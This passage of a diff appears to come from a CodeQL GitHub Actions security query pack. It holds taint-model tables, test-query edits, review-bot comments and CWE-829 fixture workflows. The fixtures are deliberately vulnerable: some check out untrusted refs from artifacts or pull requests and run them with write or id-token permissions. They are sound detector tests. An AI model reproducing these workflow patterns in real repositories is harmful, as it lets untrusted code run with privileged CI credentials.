output.head_ref | branch | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | 
output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | +| tim-actions/get-pr-commits | * | output.commits | text | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | 
manual | +summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| AsasInnab/regex-action | * | input.search_string | output.first_match | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_first | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_json | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | +| actions-ecosystem/action-regex-match | * | input.text | output.* | taint | manual | +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| 
aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | 
taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| dsfx3d/action-extract-unique-matches | * | input.text | output.matches | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | 
input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| 
kaisugi/action-regex-match | * | input.text | output.* | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| 
paulschuberth/regex-extract-action | * | input.haystack | output.matches | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| release-kit/regex | * | input.string | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | +| 
tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE=$(ls \| grep -E "*.(tar.gz\|zip)$") | +isBashParameterExpansion +| parameter1 | | | +| parameter2 | | | +| parameter3 | ! | | +| parameter4 | # | | +| parameter5 | :- | value | +| parameter6 | : | =value | +| parameter7 | :+ | value | +| parameter8 | : | ?value | +| parameter9 | : | =default value | +| parameter10 | ## | */ | +| parameter11 | /# | pattern/string | +| parameter12 | /% | pattern/string | +| parameter13 | , | pattern | +| parameter14 | ,, | pattern | +| parameter15 | ^ | pattern | +| parameter16 | ^^ | pattern | +| parameter17 | : | start | +| parameter18 | # | pattern | +| parameter19 | ## | pattern | +| parameter20 | % | pattern | +| parameter21 | %% | pattern | +| parameter22 | / | pattern/string | +| parameter23 | // | pattern/string | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 03f9e5b1840..e4c1d9e443d 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -21,8 +21,6 @@ query predicate extJobs(ExternalJob s) { any() } query predicate steps(Step s) { any() } -query predicate runSteps(Run run, string body) { run.getScript() = body } - query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } query predicate uses(Uses s) { any() } @@ -59,8 +57,6 @@ query predicate summaries( actionsSummaryModel(action, version, input, output, kind, provenance) } -query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } - query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } query string testNormalizeExpr(string s) { 
@@ -86,57 +82,6 @@ query predicate writeToGitHubEnv1(string content) { ) } -query predicate writeToGitHubEnv(string key, string value, string content) { - exists(string t | - t = - [ - // block - "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", - "{\necho 'VAR1<> \"$GITHUB_ENV\"", - "{\necho 'VAR2<> \"$GITHUB_ENV\"", - "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", - // multiline - "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", - "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho \"EOF\" >> \"${GITHUB_ENV}\"", - // heredoc 1 - "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", - "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", - "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", - "echo 'VAR14=$(> $GITHUB_ENV", - "echo VAR15=$(> $GITHUB_ENV", - "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", - ] and - Bash::extractFileWrite(t, "GITHUB_ENV", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - -query predicate writeToGitHubOutput(string key, string value, string content) { - exists(string t | - t = - [ - "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", - "echo 'VAR5=$(> $GITHUB_OUTPUT", - "echo VAR6=$(> $GITHUB_OUTPUT", - "echo VAR7=$(> \"$GITHUB_OUTPUT\"", - "echo VAR8=$(> ${GITHUB_OUTPUT}", - "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", - ] and - Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - query predicate isBashParameterExpansion(string parameter, string operator, string params) { exists(string test | test = 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml new file mode 100644 index 00000000000..72db8c29370 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -0,0 +1,36 @@ +on: + workflow_call: + inputs: + comment: + type: string + required: true + outputs: + SHOULD_RUN: + value: ${{ jobs.resolve.outputs.SHOULD_RUN }} + GIT_REF: + value: ${{ jobs.resolve.outputs.GIT_REF }} +jobs: + resolve: + runs-on: ubuntu-latest + outputs: + SHOULD_RUN: ${{ steps.resolve-step.outputs.SHOULD_RUN }} + GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - if: github.event_name == 'workflow_run' + uses: ./.github/actions/download-artifact + - id: resolve-step + env: + ALLOWED_COMMENT: ${{ inputs.comment }} + run: | + if [[ "${{ github.event_name }}" == "workflow_run" ]]; then + if [[ "$(head -n 1 /tmp/artifacts/metadata.txt)" == *"$ALLOWED_COMMENT"* ]]; then + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=false >> "$GITHUB_OUTPUT" + fi + echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + echo GIT_REF="" >> "$GITHUB_OUTPUT" + fi diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml new file mode 100644 index 00000000000..32f45698a56 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml 
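Review bot: resolve-args.yml has no comment saying which flow it exercises, so the reason the new UntrustedCheckoutCritical.expected alert is reported at test27.yml with test26.yml's `workflow_run` as the trigger has to be reconstructed by hand. As written, the `resolve-step` run step copies the last line of `/tmp/artifacts/metadata.txt` into the `GIT_REF` output, test26.yml forwards `needs.resolve.outputs.GIT_REF` as `git_ref`, and test27.yml checks that ref out under `id-token: write` and runs `./cmd`. A header comment in each of the three fixtures would record this, for example `# CWE-829 fixture: GIT_REF is read from a downloaded artifact and reaches the checkout ref in test27.yml via test26.yml`. The same applies to the test26.yml and test27.yml hunks that follow.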
@@ -0,0 +1,22 @@ +on: + schedule: + - cron: '7 18 * * *' + workflow_run: + workflows: [Trigger] + types: [completed] + workflow_dispatch: +jobs: + resolve: + if: (github.repository == 'test/test' && (github.event_name != 'workflow_run' || github.event.workflow_run.conclusion == 'success')) || github.event_name == 'workflow_dispatch' + uses: ./.github/workflows/resolve-args.yml + with: + comment: "foo" + scale: + permissions: + id-token: write + statuses: write + needs: [resolve] + if: needs.resolve.outputs.SHOULD_RUN == 'true' + uses: ./.github/workflows/test27.yml + with: + git_ref: ${{ needs.resolve.outputs.GIT_REF }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml new file mode 100644 index 00000000000..b1d776ef6c8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -0,0 +1,22 @@ +on: + workflow_dispatch: + inputs: + git_ref: + description: ref + type: string + workflow_call: + inputs: + git_ref: + type: string +jobs: + run: + permissions: + id-token: write + statuses: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ inputs.git_ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml new file mode 100644 index 00000000000..5f67fecc09a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml 
@@ -0,0 +1,20 @@ +on: + pull_request_target: + types: [opened, ready_for_review, synchronize, reopened, labeled, unlabeled] + branches: + - main + +permissions: + contents: read + +jobs: + setup-environment: + permissions: + contents: write + runs-on: ubuntu-latest + if: ${{ !contains(github.event.pull_request.labels.*.name, 'major-update') && (github.actor == 'renovate[bot]' || contains(github.event.pull_request.labels.*.name, 'renovatebot')) }} + steps: + - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ github.head_ref }} + - run: make foo diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de8..ec6a664a7ab 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
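Review bot: test28.yml adds `edges` rows to UntrustedCheckoutCritical.expected but, in the hunks shown, no result row in either .expected file, and nothing in the fixture says that this is the intended outcome. If the `if:` on `setup-environment` is meant to count as a sufficient control, a comment should say so, e.g. `# negative case: job gated on actor/label check, no UntrustedCheckout alert expected`. It would also help to state which half of the `||` the expectation relies on, since `github.actor == 'renovate[bot]'` describes who triggered the run rather than who authored the commit at `github.head_ref`, while the label test depends on who is allowed to apply labels.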
@@ -7,6 +7,7 @@ edges | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | 
@@ -172,6 +173,9 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | 
@@ -279,6 +283,8 @@ edges | .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | +| .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -318,10 +324,8 @@ edges | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | 
